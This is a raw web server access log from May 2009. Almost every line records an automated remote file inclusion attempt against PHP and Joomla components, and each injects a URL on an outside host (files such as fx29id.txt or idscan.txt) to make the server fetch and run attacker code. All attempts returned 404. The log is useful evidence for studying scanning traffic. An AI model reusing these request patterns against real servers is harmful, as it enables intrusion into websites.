190.144.44.36 - - [16/May/2009:01:37:39 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
84.112.140.135 - - [16/May/2009:01:37:43 -0400] "GET /logs/access_log.Q108083000//components/errors.php?error=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
69.94.30.156 - - [16/May/2009:01:37:44 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:01:37:44 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:01:37:45 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:01:37:45 -0400] "GET /logs/access_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:38:17 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:38:17 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:38:47 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:38:47 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
69.94.30.156 - - [16/May/2009:01:38:57 -0400] "GET /logs/access_log.Q108111500%20%20//components/com_flyspray/startdown.php?file=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:01:38:57 -0400] "GET /logs/access_log.Q108081800%20%20//components/com_flyspray/startdown.php?file=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:01:39:22 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:01:39:22 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:39:33 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:39:34 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
80.175.200.42 - - [16/May/2009:01:39:38 -0400] "GET /logs/error_log.Q108120200%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.175.200.42 - - [16/May/2009:01:39:38 -0400] "GET /logs/error_log.Q108102000%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.44.32 - - [16/May/2009:01:39:42 -0400] "GET ///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:01:39:42 -0400] "GET /logs///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:01:39:42 -0400] "GET /logs/access_log.Q108111500///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
77.221.130.2 - - [16/May/2009:01:40:02 -0400] "GET ///vwar/backup/errors.php?error=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:40:02 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:40:02 -0400] "GET /logs/access_log.Q108090900///vwar/backup/errors.php?error=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.230.85.142 - - [16/May/2009:01:40:02 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
222.236.44.32 - - [16/May/2009:01:40:02 -0400] "GET /logs/access_log.Q109020500///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
77.221.130.2 - - [16/May/2009:01:40:23 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:40:23 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:40:23 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:40:23 -0400] "GET /logs/access_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:01:40:54 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:01:40:59 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.52.255.82 - - [16/May/2009:01:41:02 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:41:02 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.44.32 - - [16/May/2009:01:41:04 -0400] "GET /logs/access_log.Q108111500///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:01:41:04 -0400] "GET /logs///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:01:41:04 -0400] "GET ///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
72.52.255.82 - - [16/May/2009:01:41:04 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:41:04 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.59.12.99 - - [16/May/2009:01:41:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.2 - - [16/May/2009:01:41:31 -0400] "GET /logs/access_log.Q108081800%20%20//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:41:31 -0400] "GET /logs/access_log.Q108111500%20%20//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:01:41:39 -0400] "GET //components/com_flyspray/startdown.php?file=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.236.44.45 - - [16/May/2009:01:41:41 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.63"
222.236.44.45 - - [16/May/2009:01:41:42 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.63"
222.236.44.45 - - [16/May/2009:01:41:42 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.63"
122.153.212.195 - - [16/May/2009:01:41:43 -0400] "GET /logs/access_log.Q108081800//components/com_flyspray/startdown.php?file=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:01:41:44 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.236.44.32 - - [16/May/2009:01:41:47 -0400] "GET /logs/access_log.Q109020500///startdown.php?file=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
122.153.212.195 - - [16/May/2009:01:41:47 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.175.180.194 - - [16/May/2009:01:42:11 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:42:11 -0400] "GET /logs/access_log.Q108112200%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:42:11 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:42:20 -0400] "GET /logs/access_log.Q108112200%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:42:20 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:42:20 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
72.52.255.82 - - [16/May/2009:01:42:51 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:42:51 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.236.44.45 - - [16/May/2009:01:43:31 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.63"
80.175.200.42 - - [16/May/2009:01:43:42 -0400] "GET /logs/access_log.Q108112900/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
80.175.200.42 - - [16/May/2009:01:43:42 -0400] "GET /logs/access_log.Q109010100/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.175.180.194 - - [16/May/2009:01:44:01 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:44:01 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:44:01 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:01:44:01 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
222.122.26.5 - - [16/May/2009:01:44:05 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:01:44:05 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:44:09 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:44:09 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.236.44.45 - - [16/May/2009:01:45:22 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.63"
91.121.210.42 - - [16/May/2009:01:45:28 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:01:45:28 -0400] "GET /logs/access_log.Q109051200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:01:45:28 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:45:45 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:45:45 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:45:45 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:45:45 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:45:45 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:45:45 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:46:00 -0400] "GET /logs/access_log.Q108090900%20%20///vwar/backup/errors.php?error=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.32.195.2 - - [16/May/2009:01:46:03 -0400] "GET //help.php?css_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [16/May/2009:01:46:03 -0400] "GET /logs/access_log.Q108122500//help.php?css_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [16/May/2009:01:46:04 -0400] "GET /logs//help.php?css_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
122.153.212.195 - - [16/May/2009:01:46:08 -0400] "GET /logs/access_log.Q108111500%20%20//components/com_flyspray/startdown.php?file=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:01:46:08 -0400] "GET /logs/access_log.Q108081800%20%20//components/com_flyspray/startdown.php?file=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:01:46:10 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:01:46:10 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:01:46:10 -0400] "GET /logs/access_log.Q109051200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:01:46:11 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:46:18 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:46:18 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.59.12.99 - - [16/May/2009:01:46:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [16/May/2009:01:46:36 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:46:39 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.232.198.162 - - [16/May/2009:01:47:02 -0400] "GET /logs/admin/inc/change_action.php?format_menue=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.232.198.162 - - [16/May/2009:01:47:02 -0400] "GET /logs/access_log.Q109020500%20%20/admin/inc/change_action.php?format_menue=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.232.198.162 - - [16/May/2009:01:47:02 -0400] "GET /admin/inc/change_action.php?format_menue=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:47:44 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:47:44 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
210.240.12.4 - - [16/May/2009:01:48:24 -0400] "GET //modules/xfsection/modify.php?dir_module=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
210.240.12.4 - - [16/May/2009:01:48:24 -0400] "GET /logs/access_log.Q109020500//modules/xfsection/modify.php?dir_module=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
210.240.12.4 - - [16/May/2009:01:48:24 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
212.150.52.114 - - [16/May/2009:01:48:35 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:01:48:44 -0400] "GET /logs/access_log.Q109022600//modules/xfsection/modify.php?dir_module=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
212.150.52.114 - - [16/May/2009:01:48:44 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:48:50 -0400] "GET /logs/access_log.Q108100600%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:01:49:02 -0400] "GET /logs/access_log.Q108100600%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:49:19 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:49:19 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
110.45.144.106 - - [16/May/2009:01:49:46 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:49:46 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:49:46 -0400] "GET /logs/access_log.Q109020500%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:49:46 -0400] "GET /logs/access_log.Q108112900%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:49:50 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:49:50 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:49:50 -0400] "GET /logs/access_log.Q109020500%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:49:56 -0400] "GET /logs/access_log.Q108112900%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
